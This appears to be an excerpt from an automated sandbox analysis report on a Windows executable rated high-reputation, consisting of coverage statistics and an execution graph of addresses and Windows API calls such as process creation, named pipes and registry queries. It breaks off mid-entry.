                                        Reputation:high
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:2.7%
                                          Dynamic/Decrypted Code Coverage:0.3%
                                          Signature Coverage:32.6%
                                          Total number of Nodes:620
                                          Total number of Limit Nodes:36
                                          execution_graph 27560 7ff73a5da434 27561 7ff73a5da44d 27560->27561 27562 7ff73a5da58b 27561->27562 27564 7ff73a5da455 __scrt_acquire_startup_lock 27561->27564 27602 7ff73a5da9c0 9 API calls 27562->27602 27565 7ff73a5da595 27564->27565 27571 7ff73a5da473 __scrt_release_startup_lock 27564->27571 27603 7ff73a5da9c0 9 API calls 27565->27603 27567 7ff73a5da5a0 27569 7ff73a5da5a8 _exit 27567->27569 27568 7ff73a5da498 27570 7ff73a5da51e _get_initial_narrow_environment __p___argv __p___argc 27580 7ff73a5918b0 AddVectoredExceptionHandler SetThreadStackGuarantee GetCurrentThread SetThreadDescription 27570->27580 27571->27568 27571->27570 27574 7ff73a5da516 _register_thread_local_exe_atexit_callback 27571->27574 27574->27570 27576 7ff73a5da547 27576->27567 27577 7ff73a5da54b 27576->27577 27578 7ff73a5da555 27577->27578 27579 7ff73a5da550 _cexit 27577->27579 27578->27568 27579->27578 27582 7ff73a591922 27580->27582 27585 7ff73a591949 27580->27585 27583 7ff73a591acb 27582->27583 27582->27585 27616 7ff73a5db720 21 API calls 27583->27616 27604 7ff73a5a1850 27585->27604 27587 7ff73a591ad2 27617 7ff73a5db06a 21 API calls 27587->27617 27588 7ff73a59197d 27592 7ff73a591a2f 27588->27592 27613 7ff73a59c600 21 API calls 27588->27613 27610 7ff73a591000 27592->27610 27593 7ff73a591a22 27614 7ff73a59c7c0 HeapFree 27593->27614 27599 7ff73a591abf 27601 7ff73a5dab10 GetModuleHandleW 27599->27601 27601->27576 27602->27565 27603->27567 27605 7ff73a5a1863 HeapAlloc 27604->27605 27606 7ff73a5a186d GetProcessHeap 27604->27606 27605->27606 27608 7ff73a591974 27606->27608 27609 7ff73a5dbe29 HeapAlloc 27606->27609 27608->27587 27608->27588 27609->27608 27618 7ff73a591224 27610->27618 27611 7ff73a591006 27611->27599 27615 7ff73a5db770 WaitOnAddress GetLastError WakeByAddressAll 27611->27615 27613->27593 27614->27592 27615->27599 27671 7ff73a5910dc 27618->27671 27621 7ff73a591269 27677 7ff73a591c90 27621->27677 27622 7ff73a59165c 27784 7ff73a5dc005 21 API calls 27622->27784 27625 7ff73a59166f 27785 7ff73a5dc005 21 API calls 27625->27785 27626 7ff73a591285 27627 7ff73a5910dc 21 API calls 27626->27627 27630 7ff73a5916f8 27626->27630 27629 7ff73a5912b5 27627->27629 27629->27625 27635 7ff73a5912cb 27629->27635 27789 7ff73a5db200 21 API calls 27630->27789 27632 7ff73a591568 27790 7ff73a5db580 21 API calls 27632->27790 27685 7ff73a5a5000 27635->27685 27640 7ff73a5916e2 27787 7ff73a5dbc80 WaitOnAddress GetLastError 27640->27787 27641 7ff73a5916ee 27788 7ff73a5db720 21 API calls 27641->27788 27642 7ff73a59145c 27642->27640 27642->27641 27646 7ff73a5914c1 27642->27646 27645 7ff73a59130c 27647 7ff73a591c90 22 API calls 27645->27647 27646->27632 27648 7ff73a59152e 27646->27648 27656 7ff73a59156d 27646->27656 27649 7ff73a591366 27647->27649 27650 7ff73a5915c2 27648->27650 27651 7ff73a591537 27648->27651 27649->27630 27735 7ff73a5a5220 strlen 27649->27735 27652 7ff73a5915eb 27650->27652 27658 7ff73a5915e1 WakeByAddressSingle 27650->27658 27781 7ff73a5db200 21 API calls 27651->27781 27652->27630 27659 7ff73a5915f4 27652->27659 27655 7ff73a5915b6 27783 7ff73a591ba0 HeapFree 27655->27783 27656->27650 27656->27655 27782 7ff73a591ba0 HeapFree 27656->27782 27657 7ff73a59138d 27663 7ff73a591398 CreateWaitableTimerExW 27657->27663 27658->27652 27776 7ff73a5a4ee0 27659->27776 27665 7ff73a5913b1 SetWaitableTimer 27663->27665 27666 7ff73a591404 Sleep 27663->27666 27664 7ff73a59163d 27664->27611 27667 7ff73a5913fb CloseHandle 27665->27667 27668 7ff73a5913dd WaitForSingleObject CloseHandle 27665->27668 27669 7ff73a59140d 27666->27669 27667->27666 27668->27669 27670 7ff73a5913f9 27668->27670 27669->27642 27786 7ff73a5db770 WaitOnAddress GetLastError WakeByAddressAll 27669->27786 27670->27666 27672 7ff73a5910f7 27671->27672 27676 7ff73a591119 27671->27676 27674 7ff73a59112e 27672->27674 27675 7ff73a5a1850 3 API calls 27672->27675 27672->27676 27674->27621 27674->27622 27675->27676 27676->27674 27791 7ff73a5db050 21 API calls 27676->27791 27678 7ff73a5a1850 3 API calls 27677->27678 27679 7ff73a591cbd 27678->27679 27680 7ff73a591cc2 memmove 27679->27680 27681 7ff73a591d3b 27679->27681 27683 7ff73a591cd9 27680->27683 27792 7ff73a5db050 21 API calls 27681->27792 27683->27626 27686 7ff73a5a5175 27685->27686 27687 7ff73a5a5026 27685->27687 27686->27645 27687->27686 27688 7ff73a5a50a4 strlen 27687->27688 27690 7ff73a5a50d2 27687->27690 27688->27687 27692 7ff73a5a5149 27690->27692 27793 7ff73a5aceb0 27690->27793 27821 7ff73a5ad8c0 20 API calls 27690->27821 27822 7ff73a5ad4f0 RegQueryValueExW RegOpenKeyExW RegCloseKey 27690->27822 27692->27686 27816 7ff73a5bc890 27692->27816 27695 7ff73a5adcbb 27696 7ff73a5b8570 12 API calls 27695->27696 27697 7ff73a5adcf8 27696->27697 27698 7ff73a5bbcf0 6 API calls 27697->27698 27702 7ff73a5add01 27697->27702 27698->27702 27699 7ff73a5b7f90 12 API calls 27700 7ff73a5add9e 27699->27700 27703 7ff73a5adf7f 27700->27703 27704 7ff73a5addab 27700->27704 27701 7ff73a5adf50 27701->27645 27702->27699 27702->27701 27706 7ff73a5dc660 6 API calls 27703->27706 27705 7ff73a5bc230 7 API calls 27704->27705 27707 7ff73a5adde2 27705->27707 27712 7ff73a5adfb2 27706->27712 27708 7ff73a5b85b0 24 API calls 27707->27708 27709 7ff73a5ade05 27708->27709 27710 7ff73a5adfb7 27709->27710 27711 7ff73a5ade0e 27709->27711 27713 7ff73a5dc660 6 API calls 27710->27713 27714 7ff73a5c40e0 memmove 27711->27714 27712->27645 27713->27712 27715 7ff73a5ade27 memmove 27714->27715 27716 7ff73a5ade53 27715->27716 27717 7ff73a5ade61 27716->27717 27718 7ff73a5adfeb 27716->27718 27720 7ff73a5c41d0 memmove 27717->27720 27719 7ff73a5dc330 6 API calls 27718->27719 27719->27712 27721 7ff73a5ade85 27720->27721 27722 7ff73a5c41d0 memmove 27721->27722 27723 7ff73a5ade9b 27722->27723 27724 7ff73a5c41d0 memmove 27723->27724 27725 7ff73a5adeaa 27724->27725 27726 7ff73a5bc330 121 API calls 27725->27726 27727 7ff73a5adec1 27726->27727 27728 7ff73a5ae005 27727->27728 27729 7ff73a5adece 27727->27729 27731 7ff73a5dc660 6 API calls 27728->27731 27730 7ff73a5ad920 CloseHandle CloseHandle CloseHandle CloseHandle CloseHandle 27729->27730 27732 7ff73a5adf10 27730->27732 27731->27712 27733 7ff73a5ada60 9 API calls 27732->27733 27734 7ff73a5adf19 27733->27734 27734->27701 27736 7ff73a5a5249 27735->27736 28163 7ff73a5b8570 27736->28163 27741 7ff73a5add9e 27744 7ff73a5adf7f 27741->27744 27745 7ff73a5addab 27741->27745 27742 7ff73a5adf50 27742->27657 27743 7ff73a5add01 27743->27742 28166 7ff73a5b7f90 27743->28166 28203 7ff73a5dc660 6 API calls 27744->28203 28181 7ff73a5bc230 27745->28181 27748 7ff73a5adde2 28187 7ff73a5b85b0 27748->28187 27751 7ff73a5adfb7 28204 7ff73a5dc660 6 API calls 27751->28204 27752 7ff73a5ade0e 27755 7ff73a5c40e0 memmove 27752->27755 27756 7ff73a5ade27 memmove 27755->27756 27757 7ff73a5ade53 27756->27757 27758 7ff73a5ade61 27757->27758 27759 7ff73a5adfeb 27757->27759 27761 7ff73a5c41d0 memmove 27758->27761 28205 7ff73a5dc330 6 API calls 27759->28205 27762 7ff73a5ade85 27761->27762 27763 7ff73a5c41d0 memmove 27762->27763 27764 7ff73a5ade9b 27763->27764 27765 7ff73a5c41d0 memmove 27764->27765 27766 7ff73a5adeaa 27765->27766 28197 7ff73a5bc330 27766->28197 27769 7ff73a5ae005 28206 7ff73a5dc660 6 API calls 27769->28206 27770 7ff73a5adece 28201 7ff73a5ad920 CloseHandle CloseHandle CloseHandle CloseHandle CloseHandle 27770->28201 27773 7ff73a5adf10 28202 7ff73a5ada60 9 API calls 27773->28202 27775 7ff73a5adf19 27775->27742 27777 7ff73a5a5660 2 API calls 27776->27777 27778 7ff73a5a4f27 27777->27778 28230 7ff73a5a6440 27778->28230 27780 7ff73a5a4f5d 27780->27664 27784->27625 27785->27669 27786->27642 27787->27641 27823 7ff73a5c40e0 27793->27823 27795 7ff73a5acf08 27827 7ff73a5c41d0 27795->27827 27797 7ff73a5acf1d 27832 7ff73a5bc3d0 27797->27832 27800 7ff73a5acf42 27866 7ff73a5acc40 9 API calls 27800->27866 27801 7ff73a5ad24f 27876 7ff73a5dc660 6 API calls 27801->27876 27805 7ff73a5acf85 27867 7ff73a5a5660 27805->27867 27807 7ff73a5acf9f 27808 7ff73a5acfdc 27807->27808 27873 7ff73a5ccff0 9 API calls 27807->27873 27874 7ff73a5dd3d0 21 API calls 27808->27874 27811 7ff73a5ad020 27813 7ff73a5ad054 27811->27813 27875 7ff73a5cd550 22 API calls 27811->27875 27814 7ff73a5ad15c 27813->27814 27815 7ff73a5ad14a memcmp 27813->27815 27814->27690 27815->27813 27815->27814 28161 7ff73a5b79a0 9 API calls 27816->28161 27818 7ff73a5bc89c 28162 7ff73a5c1a70 ExitProcess 27818->28162 27821->27690 27822->27690 27826 7ff73a5c40f7 27823->27826 27824 7ff73a5c41c8 27825 7ff73a5c412e memmove 27825->27795 27826->27824 27826->27825 27829 7ff73a5c41f5 27827->27829 27828 7ff73a5c422c memmove 27830 7ff73a5c424a 27828->27830 27829->27828 27831 7ff73a5c42a9 27829->27831 27830->27797 27831->27797 27877 7ff73a5c42f0 27832->27877 27834 7ff73a5bc410 27835 7ff73a5acf34 27834->27835 27836 7ff73a5bc43f CloseHandle 27834->27836 27837 7ff73a5bc449 27834->27837 27835->27800 27835->27801 27836->27837 27838 7ff73a5bc469 27837->27838 27839 7ff73a5bc4cd 27837->27839 27840 7ff73a5bc515 27838->27840 27841 7ff73a5bc479 27838->27841 27842 7ff73a5bc4d2 27839->27842 27843 7ff73a5bc54f WaitForSingleObject 27839->27843 28042 7ff73a5c35a0 10 API calls 27840->28042 28021 7ff73a5c3870 27841->28021 28041 7ff73a5c35a0 10 API calls 27842->28041 27844 7ff73a5bc561 GetLastError 27843->27844 27845 7ff73a5bc5a6 GetExitCodeProcess 27843->27845 27850 7ff73a5bc576 27844->27850 27845->27844 27852 7ff73a5bc592 27845->27852 27849 7ff73a5bc530 27854 7ff73a5bc542 CloseHandle 27849->27854 27855 7ff73a5bc695 27849->27855 27850->27852 27857 7ff73a5bc5f5 CloseHandle CloseHandle 27852->27857 27853 7ff73a5bc4f4 27858 7ff73a5bc4ff CloseHandle 27853->27858 27859 7ff73a5bc663 27853->27859 27854->27843 28044 7ff73a5dc660 6 API calls 27855->28044 27856 7ff73a5bc49c 28040 7ff73a5dc660 6 API calls 27856->28040 27863 7ff73a5bc60e 27857->27863 27858->27843 28043 7ff73a5dc660 6 API calls 27859->28043 27863->27835 27866->27805 27868 7ff73a5a569e 27867->27868 27869 7ff73a5a573d memmove 27868->27869 27870 7ff73a5a56d9 27868->27870 27871 7ff73a5a575f 27869->27871 27870->27807 27871->27870 27872 7ff73a5a57f6 memmove 27871->27872 27872->27871 27873->27808 27874->27811 27875->27811 27878 7ff73a5c4346 27877->27878 27879 7ff73a5c437c GetEnvironmentStringsW 27878->27879 27894 7ff73a5c434b 27878->27894 27900 7ff73a5c4509 27878->27900 27880 7ff73a5c7649 GetLastError 27879->27880 27889 7ff73a5c4392 27879->27889 28118 7ff73a5dc260 6 API calls 27880->28118 27884 7ff73a5c7776 CloseHandle 27884->27834 27885 7ff73a5c4f52 CloseHandle 27886 7ff73a5c4f5c 27885->27886 27886->27834 27887 7ff73a5c44f5 FreeEnvironmentStringsW 27887->27900 27889->27887 28075 7ff73a5c13c0 7 API calls 27889->28075 28076 7ff73a5b3b10 23 API calls 27889->28076 27890 7ff73a5c47a6 memmove 27890->27900 27893 7ff73a5c4810 memmove 27893->27900 27899 7ff73a5c4ecb 27894->27899 27913 7ff73a5c4f77 27894->27913 27979 7ff73a5c4dd2 27894->27979 27895 7ff73a5c488b memmove 28079 7ff73a5b3b10 23 API calls 27895->28079 27896 7ff73a5c479c 27896->27884 27898 7ff73a5b67f0 26 API calls 27898->27900 27902 7ff73a5c5053 27899->27902 27908 7ff73a5c4eda 27899->27908 27900->27890 27900->27893 27900->27895 27900->27896 27900->27898 27900->27900 27903 7ff73a5c4b84 27900->27903 27905 7ff73a5c75d7 27900->27905 28077 7ff73a5b1860 6 API calls 27900->28077 28078 7ff73a5b6ca0 8 API calls 27900->28078 27901 7ff73a5c4ca5 CompareStringOrdinal 27901->27903 27902->27896 27909 7ff73a5c5079 memmove 27902->27909 27903->27894 27903->27896 27903->27901 27904 7ff73a5c4d13 27903->27904 27904->27894 27907 7ff73a5c74ef GetLastError 27904->27907 28115 7ff73a5dc330 6 API calls 27905->28115 28114 7ff73a5dc260 6 API calls 27907->28114 27929 7ff73a5c4f28 27908->27929 28080 7ff73a5c0600 27908->28080 28094 7ff73a5c1a80 memmove memmove memmove 27909->28094 27914 7ff73a5c52a7 27913->27914 27913->27979 28102 7ff73a5c1580 memmove 27913->28102 28045 7ff73a5c1810 27914->28045 27915 7ff73a5c50b7 28095 7ff73a5c8aa0 27915->28095 27919 7ff73a5c50ea 27919->27929 28101 7ff73a5bbcf0 6 API calls 27919->28101 27920 7ff73a5c52ba 27934 7ff73a5c52c3 27920->27934 28061 7ff73a5bbba0 27920->28061 27923 7ff73a5c5314 27925 7ff73a5bace0 6 API calls 27923->27925 27924 7ff73a5bace0 6 API calls 27942 7ff73a5c529b 27924->27942 27926 7ff73a5c5353 27925->27926 27927 7ff73a5c5373 27926->27927 27931 7ff73a5bb850 7 API calls 27926->27931 27932 7ff73a5c8aa0 28 API calls 27927->27932 27929->27979 28010 7ff73a5c5d5f 27929->28010 28107 7ff73a5c0120 6 API calls 27929->28107 27930 7ff73a5c5478 SetLastError GetSystemDirectoryW 27930->27934 27935 7ff73a5c5493 GetLastError 27930->27935 27931->27927 27932->27934 27934->27929 27934->27930 27941 7ff73a5c54ad GetLastError 27934->27941 27944 7ff73a5c54e0 27934->27944 27935->27934 27940 7ff73a5c56b5 GetLastError 27935->27940 27937 7ff73a5c8aa0 28 API calls 27937->27942 27966 7ff73a5c5552 27940->27966 27941->27934 27946 7ff73a5c760f 27941->27946 27942->27914 27942->27924 27942->27929 27942->27937 27955 7ff73a5c1580 memmove 27942->27955 28103 7ff73a5bb850 7 API calls 27942->28103 27951 7ff73a5c7701 27944->27951 27952 7ff73a5c54e9 27944->27952 28116 7ff73a5dc330 6 API calls 27946->28116 27947 7ff73a5c67de AcquireSRWLockExclusive 27972 7ff73a5c681f 27947->27972 27949 7ff73a5c65fa 28110 7ff73a5b25b0 6 API calls 27949->28110 28119 7ff73a5dc780 6 API calls 27951->28119 28064 7ff73a5b9e30 27952->28064 27955->27942 27957 7ff73a5c54f8 28068 7ff73a5bace0 27957->28068 27959 7ff73a5c68cc 27968 7ff73a5c73cf CloseHandle 27959->27968 27969 7ff73a5c73dc 27959->27969 27960 7ff73a5c5512 27961 7ff73a5c5535 27960->27961 27963 7ff73a5bb850 7 API calls 27960->27963 27964 7ff73a5c8aa0 28 API calls 27961->27964 27962 7ff73a5c57e8 SetLastError GetWindowsDirectoryW 27965 7ff73a5c5802 GetLastError 27962->27965 27962->27966 27963->27961 27964->27966 27965->27966 27973 7ff73a5c590c GetLastError 27965->27973 27966->27929 27966->27962 27974 7ff73a5c581c GetLastError 27966->27974 27978 7ff73a5c584f 27966->27978 27967 7ff73a5c5ebe 27967->27947 27967->27979 27968->27969 27975 7ff73a5c73e6 CloseHandle 27969->27975 27976 7ff73a5c73f3 27969->27976 27970 7ff73a5c6903 27977 7ff73a5c73b8 CloseHandle 27970->27977 27971 7ff73a5c62d4 memmove 27971->28010 27972->27959 27972->27970 27991 7ff73a5c6950 27972->27991 27993 7ff73a5c70ce 27972->27993 28111 7ff73a5c9530 11 API calls 27972->28111 28014 7ff73a5c58c4 27973->28014 27974->27966 27980 7ff73a5c762c 27974->27980 27975->27976 27981 7ff73a5c73fd CloseHandle 27976->27981 27998 7ff73a5c740a 27976->27998 27977->27959 27987 7ff73a5c7726 27978->27987 27988 7ff73a5c5858 27978->27988 28015 7ff73a5c4f46 27979->28015 28093 7ff73a5b25b0 6 API calls 27979->28093 28117 7ff73a5dc330 6 API calls 27980->28117 27981->27998 27982 7ff73a5c742c ReleaseSRWLockExclusive 27982->27979 27983 7ff73a5c64d7 28109 7ff73a5b25b0 6 API calls 27983->28109 28120 7ff73a5dc780 6 API calls 27987->28120 27994 7ff73a5b9e30 memmove 27988->27994 27989 7ff73a5c718b CreateProcessW 27995 7ff73a5c7356 GetLastError 27989->27995 27996 7ff73a5c71d8 27989->27996 27997 7ff73a5c73ab CloseHandle 27991->27997 27992 7ff73a5c5993 28105 7ff73a5b81f0 12 API calls 27992->28105 27993->27989 28001 7ff73a5c738a 27993->28001 28002 7ff73a5c5867 27994->28002 27999 7ff73a5c739e CloseHandle 27995->27999 28000 7ff73a5c737b 27995->28000 28003 7ff73a5c721e CloseHandle CloseHandle CloseHandle 27996->28003 28112 7ff73a5b2de0 DeleteProcThreadAttributeList 27996->28112 27997->27977 27998->27982 27999->27997 28113 7ff73a5b2de0 DeleteProcThreadAttributeList 28000->28113 28001->27999 28007 7ff73a5bace0 6 API calls 28002->28007 28072 7ff73a5b2750 28003->28072 28009 7ff73a5c5884 28007->28009 28011 7ff73a5c58a7 28009->28011 28104 7ff73a5bb850 7 API calls 28009->28104 28010->27949 28010->27967 28010->27971 28010->27979 28010->27983 28108 7ff73a5b5320 6 API calls 28010->28108 28012 7ff73a5c8aa0 28 API calls 28011->28012 28012->28014 28014->27929 28014->27992 28015->27885 28015->27886 28016 7ff73a5bace0 6 API calls 28017 7ff73a5c59c6 28016->28017 28017->27979 28017->27993 28017->28016 28018 7ff73a5c1580 memmove 28017->28018 28020 7ff73a5c8aa0 28 API calls 28017->28020 28106 7ff73a5bb850 7 API calls 28017->28106 28018->28017 28020->28017 28146 7ff73a5c3bf0 CreateEventW 28021->28146 28023 7ff73a5c38ad 28024 7ff73a5c38ca 28023->28024 28025 7ff73a5c38b7 CloseHandle 28023->28025 28027 7ff73a5c3bf0 5 API calls 28024->28027 28026 7ff73a5bc48c 28025->28026 28026->27843 28026->27856 28037 7ff73a5c38f6 28027->28037 28028 7ff73a5c3900 28030 7ff73a5b29b0 6 API calls 28028->28030 28029 7ff73a5c3960 WaitForMultipleObjects 28029->28037 28030->28026 28031 7ff73a5c3a7c GetLastError 28039 7ff73a5c3a32 28031->28039 28032 7ff73a5c3d10 8 API calls 28032->28037 28033 7ff73a5c39d2 GetOverlappedResult 28036 7ff73a5c3af7 GetLastError 28033->28036 28033->28037 28034 7ff73a5c3993 GetOverlappedResult 28034->28037 28038 7ff73a5c3a8e GetLastError 28034->28038 28036->28039 28037->28028 28037->28029 28037->28031 28037->28032 28037->28033 28037->28034 28037->28039 28038->28039 28152 7ff73a5b29b0 28039->28152 28041->27853 28042->27849 28046 7ff73a5c18a0 28045->28046 28050 7ff73a5c1874 28045->28050 28046->28050 28047 7ff73a5c18f8 SetLastError GetModuleFileNameW 28048 7ff73a5c1915 GetLastError 28047->28048 28047->28050 28049 7ff73a5c19c8 GetLastError 28048->28049 28048->28050 28054 7ff73a5c197a 28049->28054 28050->28046 28050->28047 28051 7ff73a5c192f GetLastError 28050->28051 28053 7ff73a5c1962 28050->28053 28051->28050 28052 7ff73a5c19eb 28051->28052 28121 7ff73a5dc330 6 API calls 28052->28121 28055 7ff73a5c1a05 28053->28055 28056 7ff73a5c196b 28053->28056 28054->27920 28122 7ff73a5dc780 6 API calls 28055->28122 28059 7ff73a5b9e30 memmove 28056->28059 28059->28054 28123 7ff73a5c1cd0 6 API calls 28061->28123 28063 7ff73a5bbbbf 28067 7ff73a5b9e5b 28064->28067 28065 7ff73a5b9f95 28065->27957 28066 7ff73a5be170 memmove 28066->28067 28067->28065 28067->28066 28069 7ff73a5bad1f 28068->28069 28124 7ff73a5c1cd0 6 API calls 28069->28124 28071 7ff73a5bad47 28073 7ff73a5b2765 28072->28073 28074 7ff73a5b2774 ReleaseSRWLockExclusive 28072->28074 28073->28074 28074->28073 28075->27889 28076->27889 28077->27900 28078->27900 28079->27900 28081 7ff73a5c0614 28080->28081 28084 7ff73a5c0628 28080->28084 28081->27929 28082 7ff73a5c0643 28125 7ff73a5c2190 28082->28125 28084->28082 28086 7ff73a5c069d 28084->28086 28087 7ff73a5c0684 28084->28087 28085 7ff73a5c0662 28085->27929 28086->28082 28090 7ff73a5c06e0 28086->28090 28142 7ff73a5cac20 13 API calls 28087->28142 28089 7ff73a5c0697 28089->27929 28143 7ff73a5cb140 13 API calls 28090->28143 28092 7ff73a5c06f8 28092->27929 28093->28015 28094->27915 28096 7ff73a5c8abc 28095->28096 28097 7ff73a5c0600 27 API calls 28096->28097 28100 7ff73a5c8b0c 28096->28100 28098 7ff73a5c8aee 28097->28098 28099 7ff73a5c8af8 GetFileAttributesW 28098->28099 28098->28100 28099->28100 28100->27919 28102->27942 28103->27942 28104->28011 28105->28017 28106->28017 28107->27929 28108->28010 28109->27979 28110->27967 28111->27993 28112->28003 28113->28001 28123->28063 28124->28071 28128 7ff73a5c21ca 28125->28128 28126 7ff73a5c23a4 SetLastError GetFullPathNameW 28127 7ff73a5c23cf GetLastError 28126->28127 28126->28128 28127->28128 28129 7ff73a5c2457 GetLastError 28127->28129 28128->28126 28130 7ff73a5c23e4 GetLastError 28128->28130 28132 7ff73a5c2412 28128->28132 28137 7ff73a5c2236 28128->28137 28129->28137 28130->28128 28131 7ff73a5c2855 28130->28131 28144 7ff73a5dc330 6 API calls 28131->28144 28134 7ff73a5c286f 28132->28134 28135 7ff73a5c241b 28132->28135 28145 7ff73a5dc780 6 API calls 28134->28145 28138 7ff73a5c252f 28135->28138 28140 7ff73a5c286d 28135->28140 28141 7ff73a5c2694 memmove 28135->28141 28137->28085 28139 7ff73a5c277f memmove 28138->28139 28138->28140 28139->28137 28140->28085 28141->28138 28142->28089 28143->28092 28147 7ff73a5c3c7d GetLastError CloseHandle 28146->28147 28148 7ff73a5c3c2b 28146->28148 28149 7ff73a5c3caa 28147->28149 28148->28149 28151 7ff73a5c3c49 28148->28151 28150 7ff73a5c3cc1 CloseHandle CloseHandle 28149->28150 28150->28023 28151->28023 28155 7ff73a5c3f70 28152->28155 28154 7ff73a5b29cd CloseHandle CloseHandle 28156 7ff73a5c3f92 CancelIo 28155->28156 28160 7ff73a5c3fc8 28155->28160 28157 7ff73a5c3fd0 GetLastError 28156->28157 28158 7ff73a5c3fa6 GetOverlappedResult 28156->28158 28157->28160 28159 7ff73a5c402c GetLastError 28158->28159 28158->28160 28159->28160 28160->28154 28161->27818 28164 7ff73a5c1810 12 API calls 28163->28164 28165 7ff73a5adcf8 28164->28165 28165->27743 28200 7ff73a5bbcf0 6 API calls 28165->28200 28168 7ff73a5b7ff4 28166->28168 28167 7ff73a5b8078 SetLastError GetCurrentDirectoryW 28167->28168 28169 7ff73a5b8093 GetLastError 28167->28169 28168->28167 28171 7ff73a5b80ad GetLastError 28168->28171 28172 7ff73a5b80e0 28168->28172 28169->28168 28170 7ff73a5b8148 GetLastError 28169->28170 28173 7ff73a5b80f8 28170->28173 28171->28168 28174 7ff73a5b816b 28171->28174 28175 7ff73a5b8185 28172->28175 28176 7ff73a5b80e9 28172->28176 28173->27741 28207 7ff73a5dc330 6 API calls 28174->28207 28208 7ff73a5dc780 6 API calls 28175->28208 28178 7ff73a5b9e30 memmove 28176->28178 28178->28173 28184 7ff73a5bc25c 28181->28184 28182 7ff73a5bc293 memmove 28183 7ff73a5bace0 6 API calls 28182->28183 28185 7ff73a5bc2c4 28183->28185 28184->28182 28186 7ff73a5bc2e5 28184->28186 28185->27748 28186->27748 28209 7ff73a5c0700 28187->28209 28189 7ff73a5ade05 28189->27751 28189->27752 28190 7ff73a5b86c0 CloseHandle 28190->28189 28193 7ff73a5b860b 28193->28189 28193->28190 28194 7ff73a5b8708 28193->28194 28221 7ff73a5c0e60 28193->28221 28229 7ff73a5dc700 6 API calls 28194->28229 28198 7ff73a5c42f0 121 API calls 28197->28198 28199 7ff73a5adec1 28198->28199 28199->27769 28199->27770 28201->27773 28202->27775 28210 7ff73a5c071f 28209->28210 28211 7ff73a5c2190 13 API calls 28210->28211 28217 7ff73a5c0781 28210->28217 28215 7ff73a5c0754 28211->28215 28212 7ff73a5c0857 CreateFileW 28213 7ff73a5c08e7 GetLastError 28212->28213 28214 7ff73a5c089c 28212->28214 28213->28217 28216 7ff73a5c08ab GetLastError 28214->28216 28214->28217 28215->28212 28215->28217 28216->28217 28218 7ff73a5c08b8 SetFileInformationByHandle 28216->28218 28217->28193 28218->28217 28219 7ff73a5c0929 GetLastError CloseHandle 28218->28219 28220 7ff73a5c0948 28219->28220 28220->28217 28222 7ff73a5c0ea4 NtWriteFile 28221->28222 28223 7ff73a5c0e94 28221->28223 28224 7ff73a5c0ef1 WaitForSingleObject 28222->28224 28225 7ff73a5c0f0a 28222->28225 28223->28222 28224->28225 28226 7ff73a5c0f41 28224->28226 28227 7ff73a5c0f0e 28225->28227 28228 7ff73a5c0f1b RtlNtStatusToDosError 28225->28228 28227->28193 28228->28227 28231 7ff73a5a6482 28230->28231 28302 7ff73a5a6713 28230->28302 28232 7ff73a5a64bf 28231->28232 28233 7ff73a5a65cc 28231->28233 28234 7ff73a5a6764 28232->28234 28235 7ff73a5a64d3 28232->28235 28237 7ff73a5a65e6 28233->28237 28238 7ff73a5a6d0a 28233->28238 28234->28238 28241 7ff73a5a677e 28234->28241 28236 7ff73a5a64f1 28235->28236 28281 7ff73a5a6817 28235->28281 28239 7ff73a5a6505 28236->28239 28240 7ff73a5a699b 28236->28240 28305 7ff73a5b0810 6 API calls 28237->28305 28322 7ff73a5dc660 6 API calls 28238->28322 28243 7ff73a5a6aa3 28239->28243 28244 7ff73a5a6523 28239->28244 28240->28238 28255 7ff73a5a69b5 28240->28255 28307 7ff73a5b1440 7 API calls 28241->28307 28250 7ff73a5a6c56 28243->28250 28258 7ff73a5a6c5b memmove 28243->28258 28260 7ff73a5a6ad2 28243->28260 28275 7ff73a5a6a91 28243->28275 28251 7ff73a5a6537 28244->28251 28244->28260 28245 7ff73a5a68c5 28248 7ff73a5a68ec 28245->28248 28278 7ff73a5a6dc5 28245->28278 28309 7ff73a5b1650 memset memmove 28248->28309 28249 7ff73a5a65fd 28257 7ff73a5a6d24 28249->28257 28294 7ff73a5a6608 28249->28294 28250->28258 28265 7ff73a5a6bbf 28251->28265 28268 7ff73a5a6555 28251->28268 28252 7ff73a5a6ced 28318 7ff73a5dc330 6 API calls 28252->28318 28253 7ff73a5a6795 28261 7ff73a5a67a2 28253->28261 28262 7ff73a5a6d8c 28253->28262 28311 7ff73a5b0810 6 API calls 28255->28311 28319 7ff73a5dc660 6 API calls 28257->28319 28316 7ff73a5a5eb0 memmove 28258->28316 28269 7ff73a5a6afb 28260->28269 28260->28275 28308 7ff73a5b10e0 15 API calls 28261->28308 28320 7ff73a5dc660 6 API calls 28262->28320 28265->28275 28280 7ff73a5a6bd9 28265->28280 28266 7ff73a5a6e30 28323 7ff73a5dc660 6 API calls 28266->28323 28284 7ff73a5a657a memmove 28268->28284 28268->28302 28313 7ff73a5af850 7 API calls 28269->28313 28271 7ff73a5a69cc 28271->28266 28277 7ff73a5a69d7 28271->28277 28273 7ff73a5a66d4 28306 7ff73a5b10e0 15 API calls 28273->28306 28325 7ff73a5dc660 6 API calls 28275->28325 28286 7ff73a5a6a01 28277->28286 28287 7ff73a5a6e7d 28277->28287 28321 7ff73a5dc660 6 API calls 28278->28321 28279 7ff73a5a6cd0 28317 7ff73a5dc330 6 API calls 28279->28317 28314 7ff73a5af850 7 API calls 28280->28314 28281->28245 28281->28252 28304 7ff73a5b0c00 9 API calls 28284->28304 28312 7ff73a5b1650 memset memmove 28286->28312 28324 7ff73a5dc660 6 API calls 28287->28324 28289 7ff73a5a6902 28310 7ff73a5b10e0 15 API calls 28289->28310 28294->28273 28294->28279 28295 7ff73a5a6c33 28315 7ff73a5b0940 7 API calls 28295->28315 28297 7ff73a5a65b0 28297->28302 28326 7ff73a5dc660 6 API calls 28297->28326 28300 7ff73a5a6b7a 28301 7ff73a5a6b88 memmove 28300->28301 28301->28302 28302->27780 28303 7ff73a5a6a1e 28303->28275 28303->28300 28303->28301 28304->28297 28305->28249 28306->28302 28307->28253 28308->28302 28309->28289 28310->28302 28311->28271 28312->28303 28313->28297 28314->28295 28315->28297 28316->28297 28327 7ff73a5aefd0 7 API calls 28328 7ff73a5c8c9f 28333 7ff73a5c2940 28328->28333 28330 7ff73a5c8cb1 28331 7ff73a5c8cc5 28330->28331 28332 7ff73a5c8dfb CloseHandle 28330->28332 28332->28331 28334 7ff73a5c29a0 GetCurrentProcessId 28333->28334 28342 7ff73a5c29b0 28334->28342 28335 7ff73a5c29c7 BCryptGenRandom 28335->28342 28337 7ff73a5c2e40 CreateNamedPipeW 28338 